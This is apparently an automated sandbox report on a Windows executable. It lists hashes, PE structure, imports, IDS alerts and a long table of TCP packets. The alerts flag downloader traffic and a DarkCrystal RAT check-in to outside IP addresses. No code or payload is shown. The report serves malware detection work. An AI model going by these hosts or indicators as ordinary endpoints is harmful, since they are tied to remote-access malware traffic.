SHA512:	749960a94e094cfa6dffae4f0e027b8b6b0380b56ed365e07decc7e72d120466850ab88fb3426b44a18a756b4f8461824265777065d9f8609969ae6837ea9b9d
SSDEEP:	98304:S9LlIIN5pdgRiP7qBRbNarfV4sDUdX0lDJ:iLlID8ahaGiU6lD
TLSH:	A516332FE8DB6D6DE8381B19AFC6A1B1A883E284037305F3459F2741A64547B5FCA0DD
File Content Preview:	MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L.....+g...............I..@...................A...@.......................... A.......A....................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x401000
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x672BAEEA [Wed Nov 6 18:01:14 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	1
OS Version Minor:	0
File Version Major:	1
File Version Minor:	0
Subsystem Version Major:	1
Subsystem Version Minor:	0
Import Hash:	140094f13383e9ae168c4b35b6af3356

Entrypoint Preview

Instruction
call 00007F1AA8C674AEh
push 00000000h
call dword ptr [008100A4h]
ret
outsd
inc esi

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x410000	0x1fc	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x411000	0x318	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x40ef66	0x40f000	53036d904f1f6d6acaf5f414de8cff50	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.idata	0x410000	0x1fc	0x200	d84301b451ace8d05425098a4a3752e6	False	0.5234375	data	3.97467876802956	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x411000	0x318	0x400	b3724a137a03d4cf31e158c1a5528e9e	False	0.4052734375	data	4.649482385128236	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x411058	0x2bd	XML 1.0 document, ASCII text, with CRLF line terminators			0.5106990014265336

Imports

DLL	Import
kernel32.dll	CreateThread, ExitProcess, GetComputerNameA, GetModuleFileNameA, GetModuleHandleW, GetProcAddress, SetErrorMode, Sleep, VirtualAllocExNuma
Shlwapi.dll	PathFindFileNameA
msvcrt.dll	malloc, free, memset, strcmp, _strcmpi, strcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-14T04:52:40.328946+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49732	104.21.93.27	443	TCP
2024-11-14T04:52:46.163537+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49735	104.21.93.27	443	TCP
2024-11-14T04:52:52.734489+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	172.202.163.200	443	192.168.2.4	49738	TCP
2024-11-14T04:53:12.903458+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49751	104.21.77.97	80	TCP
2024-11-14T04:53:31.460110+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	172.202.163.200	443	192.168.2.4	49817	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 14, 2024 04:52:36.519522905 CET	49730	443	192.168.2.4	104.21.93.27
Nov 14, 2024 04:52:36.519572973 CET	443	49730	104.21.93.27	192.168.2.4
Nov 14, 2024 04:52:36.519685030 CET	49730	443	192.168.2.4	104.21.93.27
Nov 14, 2024 04:52:36.541426897 CET	49730	443	192.168.2.4	104.21.93.27
Nov 14, 2024 04:52:36.541443110 CET	443	49730	104.21.93.27	192.168.2.4
Nov 14, 2024 04:52:37.158757925 CET	443	49730	104.21.93.27	192.168.2.4
Nov 14, 2024 04:52:37.159034967 CET	49730	443	192.168.2.4	104.21.93.27
Nov 14, 2024 04:52:37.164159060 CET	49730	443	192.168.2.4	104.21.93.27
Nov 14, 2024 04:52:37.164177895 CET	443	49730	104.21.93.27	192.168.2.4
Nov 14, 2024 04:52:37.164419889 CET	443	49730	104.21.93.27	192.168.2.4
Nov 14, 2024 04:52:37.214626074 CET	49730	443	192.168.2.4	104.21.93.27
Nov 14, 2024 04:52:37.255335093 CET	443	49730	104.21.93.27	192.168.2.4
Nov 14, 2024 04:52:37.392875910 CET	443	49730	104.21.93.27	192.168.2.4
Nov 14, 2024 04:52:37.392986059 CET	443	49730	104.21.93.27	192.168.2.4
Nov 14, 2024 04:52:37.395351887 CET	49730	443	192.168.2.4	104.21.93.27
Nov 14, 2024 04:52:37.411761999 CET	49730	443	192.168.2.4	104.21.93.27
Nov 14, 2024 04:52:39.487660885 CET	49732	443	192.168.2.4	104.21.93.27
Nov 14, 2024 04:52:39.487685919 CET	443	49732	104.21.93.27	192.168.2.4
Nov 14, 2024 04:52:39.487760067 CET	49732	443	192.168.2.4	104.21.93.27
Nov 14, 2024 04:52:39.489228010 CET	49732	443	192.168.2.4	104.21.93.27
Nov 14, 2024 04:52:39.489242077 CET	443	49732	104.21.93.27	192.168.2.4
Nov 14, 2024 04:52:40.129935980 CET	443	49732	104.21.93.27	192.168.2.4
Nov 14, 2024 04:52:40.130048037 CET	49732	443	192.168.2.4	104.21.93.27
Nov 14, 2024 04:52:40.131469965 CET	49732	443	192.168.2.4	104.21.93.27
Nov 14, 2024 04:52:40.131477118 CET	443	49732	104.21.93.27	192.168.2.4
Nov 14, 2024 04:52:40.131818056 CET	443	49732	104.21.93.27	192.168.2.4
Nov 14, 2024 04:52:40.132865906 CET	49732	443	192.168.2.4	104.21.93.27
Nov 14, 2024 04:52:40.175350904 CET	443	49732	104.21.93.27	192.168.2.4
Nov 14, 2024 04:52:40.328967094 CET	443	49732	104.21.93.27	192.168.2.4
Nov 14, 2024 04:52:40.329124928 CET	443	49732	104.21.93.27	192.168.2.4
Nov 14, 2024 04:52:40.329298019 CET	49732	443	192.168.2.4	104.21.93.27
Nov 14, 2024 04:52:40.329698086 CET	49732	443	192.168.2.4	104.21.93.27
Nov 14, 2024 04:52:41.140474081 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:41.140569925 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:41.140660048 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:41.141004086 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:41.141041994 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:41.751727104 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:41.751821995 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:41.754651070 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:41.754712105 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:41.755151033 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:41.756102085 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:41.799331903 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:41.911257029 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:41.911484003 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:41.911587954 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:41.911650896 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:41.911691904 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:41.911735058 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:41.911756992 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:41.911904097 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:41.911958933 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:41.911989927 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:41.912157059 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:41.912218094 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:41.912234068 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:41.915796041 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:41.915860891 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:41.915874004 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:41.965764999 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.025991917 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.026091099 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.026150942 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.026151896 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.026187897 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.026235104 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.026405096 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.026530027 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.026571989 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.026580095 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.026587009 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.026626110 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.027232885 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.027328968 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.027369022 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.027375937 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.027383089 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.027426004 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.028007984 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.028137922 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.028182030 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.028184891 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.028196096 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.028239012 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.028832912 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.067480087 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.067536116 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.067557096 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.067593098 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.067637920 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.141182899 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.141283035 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.141330957 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.141376019 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.141448975 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.141448975 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.141520023 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.141742945 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.141783953 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.141796112 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.141815901 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.141866922 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.142004013 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.142573118 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.142631054 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.142633915 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.142648935 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.142694950 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.142694950 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.143337011 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.143388033 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.143397093 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.143409967 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.143445015 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.143476009 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.143522978 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.143536091 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.143598080 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.144277096 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.144334078 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.144341946 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.144356012 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.144391060 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.144416094 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.145102978 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.145163059 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.145226002 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.145282984 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.145294905 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.145347118 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.182589054 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.182651043 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.182773113 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.182773113 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.182809114 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.182854891 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.257226944 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.257437944 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.257441044 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.257514000 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.257559061 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.257565022 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.257580042 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.257592916 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.257623911 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.257637024 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.257694960 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.257709980 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.257735968 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.257770061 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.257786989 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.257807016 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.257812977 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.257855892 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.257868052 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.257889032 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.257919073 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.257934093 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.257961035 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.257961035 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.258009911 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.258022070 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.258042097 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.258074045 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.258093119 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.258116961 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.258527994 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.258582115 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.258594036 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.258618116 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.258654118 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.258670092 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.258690119 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.258696079 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.258745909 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.258758068 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.258807898 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.259344101 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.259403944 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.259428978 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.259485006 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.259490967 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.259504080 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.259540081 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.259576082 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.259625912 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.259638071 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.259691954 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.262243032 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.262304068 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.262305975 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.262320042 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.262368917 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.262370110 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.262403965 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.262428045 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.262464046 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.262489080 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.262972116 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.263037920 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.263165951 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.263221979 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.263304949 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.263364077 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.263681889 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.263746977 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.263762951 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.263822079 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.298593044 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.298789024 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.414191008 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.414304018 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.414390087 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.414403915 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.414405107 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.414474010 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.414524078 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.414542913 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.414606094 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.414621115 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.414657116 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.414675951 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.414714098 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.414727926 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.414758921 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.414815903 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.414838076 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.414879084 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.414899111 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.414925098 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.414989948 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.415007114 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.415049076 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.415066004 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.415091038 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.415138006 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.415158987 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.415204048 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.415218115 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.415254116 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.415266037 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.415283918 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.415324926 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.415344954 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.415374994 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.416023970 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.416044950 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.416096926 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.416114092 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.416137934 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.416168928 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.416189909 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.416230917 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.416249037 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.416273117 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.416296005 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.416313887 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.416351080 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.416368961 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.416397095 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.465893984 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.487689018 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.487730026 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.487886906 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.487911940 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.487911940 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.487992048 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.488059044 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.488076925 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.489371061 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.489396095 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.489453077 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.489460945 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.489880085 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.489903927 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.489936113 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.489944935 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.489962101 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.544045925 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.606339931 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.606369019 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.606548071 CET	443	49733	172.66.44.59	192.168.2.4
Nov 14, 2024 04:52:42.606618881 CET	49733	443	192.168.2.4	172.66.44.59
Nov 14, 2024 04:52:42.606658936 CET	443	49733	172.66.44.59	192.168.2.4
